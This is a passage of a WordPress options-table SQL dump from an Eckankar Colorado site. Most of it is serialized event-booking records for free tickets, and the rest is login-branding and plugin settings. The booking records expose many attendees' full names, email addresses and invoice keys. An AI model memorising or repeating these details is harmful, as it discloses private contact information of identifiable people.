Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266854;s:11:\"invoice_key\";s:32:\"86dc4c79f5b6540e9fbe127089aacdfa\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423696,'PKC99995','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266855;s:11:\"invoice_key\";s:32:\"e17e9fc660262a9f2c905263ac009d12\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423718,'KLR12655','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266856;s:11:\"invoice_key\";s:32:\"a2e65913c7890d0de83b603e2ca20fb2\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423730,'VQY60201','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266857;s:11:\"invoice_key\";s:32:\"58e64cc5239ae41ae2793855d5e18f99\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423745,'UGM28529','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:12:\"Test Message\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266858;s:11:\"invoice_key\";s:32:\"7ebbcc9b89245ce98202773e670b76ce\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:12:\"Test Message\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423749,'FNV15669','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266859;s:11:\"invoice_key\";s:32:\"a2a64bf24ca23010c9e4ef3771aee56c\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423785,'CZA82590','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266860;s:11:\"invoice_key\";s:32:\"bf96ba0eaa0eb1a21183effad8625d6b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423845,'GOV55106','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"alaffertyhu@gmail.com\";s:4:\"name\";s:13:\"Anna Lafferty\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266861;s:11:\"invoice_key\";s:32:\"7fffdda9ed7ede93409c9757b9a74342\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"alaffertyhu@gmail.com\";s:4:\"name\";s:13:\"Anna Lafferty\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423858,'HDF28140','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"stuart@olypen.com\";s:4:\"name\";s:12:\"Linda Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266863;s:11:\"invoice_key\";s:32:\"3d2d6dfc10669913f78217671a0a2b4b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"stuart@olypen.com\";s:4:\"name\";s:12:\"Linda Walker\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423903,'DGX64933','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266864;s:11:\"invoice_key\";s:32:\"bcacd678afb3692b2b0638e2b612161f\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423966,'PTA53516','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"p_b_reeves@msn.com\";s:4:\"name\";s:14:\"Patrick Reeves\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266865;s:11:\"invoice_key\";s:32:\"d6ea9ae01de9ce8e50b2a65fbc905d46\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"p_b_reeves@msn.com\";s:4:\"name\";s:14:\"Patrick Reeves\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423988,'QHT74612','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"renee4eck@hotmail.com\";s:4:\"name\";s:12:\"Renee Wholey\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266866;s:11:\"invoice_key\";s:32:\"39972469ce3edadd0ec9597ebe2cb166\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"renee4eck@hotmail.com\";s:4:\"name\";s:12:\"Renee Wholey\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6424048,'KND86843','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266867;s:11:\"invoice_key\";s:32:\"622f0817c859117afe3e12c0388cfa17\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"kellywinfo@gmail.com\";s:4:\"name\";s:13:\"Kelly Walker \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6454137,'folders_hide_license_key_box','1','yes'),(6454151,'is_web_hosted_on_wp','no','yes'),(6454848,'folders_show_license_key_box_after','2022-07-27','yes'),(6458813,'RPJ12773','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1658257200:1658260800\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266885;s:11:\"invoice_key\";s:32:\"ca4026c3e382988ba935f338b77fc0ac\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6458912,'FGJ98579','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1660676400:1660680000\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266886;s:11:\"invoice_key\";s:32:\"414c3a79a3da8ef4581a86483e50251e\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6459881,'HNP42868','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1661082300:1661086800\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266887;s:11:\"invoice_key\";s:32:\"4cc4a8799fe115add6172fcde643f824\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6487451,'nf_styler_form_id_58','a:4:{s:12:\"form-wrapper\";a:1:{s:16:\"background-color\";s:7:\"#ffffff\";}s:12:\"field-labels\";a:3:{s:9:\"font-size\";s:4:\"22px\";s:10:\"font-color\";s:7:\"#2b6399\";s:11:\"line-height\";s:0:\"\";}s:12:\"radio-inputs\";a:1:{s:14:\"padding-bottom\";s:3:\"8px\";}s:11:\"text-fields\";a:1:{s:10:\"font-color\";s:7:\"#333333\";}}','yes'),(6494028,'NVE31441','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1663700400:1663704000\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266948;s:11:\"invoice_key\";s:32:\"cea7e956d9b517cc90b6774c8eac65e1\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6499038,'wpcode_snippets','a:2:{s:15:\"after_paragraph\";a:0:{}s:10:\"everywhere\";a:0:{}}','yes'),(6502774,'XRD92748','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1660676400:1660680000\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266986;s:11:\"invoice_key\";s:32:\"918ba012b0fc66002bfb917e8c341287\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6502895,'NAV22465','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1661082300:1661086800\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266987;s:11:\"invoice_key\";s:32:\"08e4fad4a876cefcb639bae3168649a4\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6513607,'white_label_general','','yes'),(6513608,'white_label_login','a:14:{s:13:\"business_name\";s:0:\"\";s:12:\"business_url\";s:29:\"https://eckankar-colorado.org\";s:15:\"login_logo_file\";s:77:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png\";s:16:\"login_logo_width\";s:2:\"66\";s:17:\"login_logo_height\";s:2:\"65\";s:21:\"login_background_file\";s:71:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/login-bk-7.jpg\";s:22:\"login_background_color\";s:7:\"#f1f1f1\";s:26:\"login_box_background_color\";s:4:\"#fff\";s:20:\"login_box_text_color\";s:4:\"#444\";s:16:\"login_text_color\";s:7:\"#555d66\";s:29:\"login_button_background_color\";s:7:\"#007cba\";s:23:\"login_button_font_color\";s:4:\"#fff\";s:16:\"login_custom_css\";s:0:\"\";s:19:\"login_page_template\";s:0:\"\";}','yes'),(6513609,'white_label_dashboard','','yes'),(6513610,'white_label_menus_plugins','','yes'),(6513611,'white_label_visual_tweaks','','yes'),(6513612,'white_label_import_export','','yes'),(6513613,'white_label_upgrade','','yes'),(6514327,'custom_login_options','a:12:{s:13:\"cl_background\";s:77:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png\";s:10:\"cl_powerby\";s:31:\"Powered by Eckankar In Colorado\";s:13:\"cl_footertext\";s:0:\"\";s:18:\"cl_backgroundColor\";s:7:\"#3ff4f4\";s:18:\"cl_backgroundImage\";s:71:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/login-bk-7.jpg\";s:15:\"cl_backgroundPY\";s:3:\"top\";s:15:\"cl_backgroundPX\";s:6:\"center\";s:19:\"cl_backgroundRepeat\";s:9:\"no-repeat\";s:8:\"cl_color\";s:7:\"#333333\";s:14:\"cl_colorShadow\";s:7:\"#000000\";s:12:\"cl_linkColor\";s:7:\"#21759B\";s:12:\"cl_customCSS\";s:0:\"\";}','yes'),(6525229,'GUZ25189','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1663501500:1663506000\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266992;s:11:\"invoice_key\";s:32:\"12ca380dc81838bebf5a609d8597f9ea\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6530502,'wpcode_notifications','a:4:{s:6:\"update\";i:1700240594;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','no'),(6530509,'_transient_wpcode_used_library_snippets','a:1:{i:12;i:266977;}','yes'),(6555671,'NPY55281','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"n.condon@yahoo.com\";s:4:\"name\";s:5:\"Nancy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1660473000:1660476600\";s:8:\"event_id\";s:6:\"266996\";s:19:\"translated_event_id\";s:6:\"266996\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;